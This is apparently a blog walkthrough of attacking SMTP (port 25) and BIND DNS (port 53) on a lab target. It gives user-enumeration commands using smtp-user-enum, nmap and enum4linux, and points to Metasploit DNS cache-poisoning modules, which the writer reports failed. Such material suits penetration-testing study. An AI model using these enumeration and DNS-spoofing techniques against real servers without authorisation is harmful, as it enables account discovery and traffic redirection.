Exploiting Port 25 – SMTP
SMTP stands for Simple Mail Transport Protocol and is a server-to-server protocol and keeps a local database of users to which it must send and receive emails.
Exploiting SMTP using Metasploit
Our first task is to determine which software and version is running behind port 25. Metasploit has an auxiliary module for you to use, so try it:
Now you can search in Google, ExploitDB, etc.
And you can also try to enumerate the service users, using the proper Metasploit module.
The module was able to extract a list of users in the SMTP service
Exploiting SMTP using other tools
SMTP has a set of commands that can be used for several tasks. You can to connect to your target through port 25 using Netcat and then get info on the email’s database using the SMTP commands.
Or, instead of verifying users one by one, you can try to use other tools.
smtp-user-enum -M VRFY -U user.txt -t [Target IP]
or
smtp-user-enum -M VRFY -u root -t [Target IP]
And you can also use Nmap to enumerate the target but the script appears to have problems.
nmap --script smtp-enum-users -p 25 [Target IP]
As a side note, keep in mind the existence of enum4linux:
enum4linux -U [Target IP]
However, these options rely on old scripts/apps created in now obsolete versions of Perl or Python so don’t be surprised if they don’t always produce the best results when used inside the current Kali version (2020.3)
Exploiting Port 53 – BIND
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) of the Internet. It performs both of the main DNS server roles, acting as an authoritative name server for domains, and acting as a recursive resolver in the network. As of 2015, it is the most widely used domain name server software and is the de facto standard on Unix-like operating systems.
Searching for exploits for ISC BIND 9.4.2, you will find the following exploit:
https://www.exploit-db.com/exploits/6122/
This exploit is labeled auxiliary/spoof/dns/bailiwicked_domain in Metasploit and it will allow you to insert malicious DNS records into the DNS server.
Exploiting DNS: bailiwicked domain
This attack allows you to add your own DNS entries to a target DNS nameserver. Thus, you could create a DNS entry like somethingveryevil.microsoft.com that would direct visitors wherever you wish.
After setting the options for the module, it should be possible to test it, but it fails:
And the exploit itself also fails.
Exploiting DNS: bailiwicked host
This attack allows you to add your own host entry to a DNS nameserver's list of hostnames. This is done by confusing the nameserver by sending responses to fake DNS queries.
Similar exploit, similar results.
No comments:
Post a Comment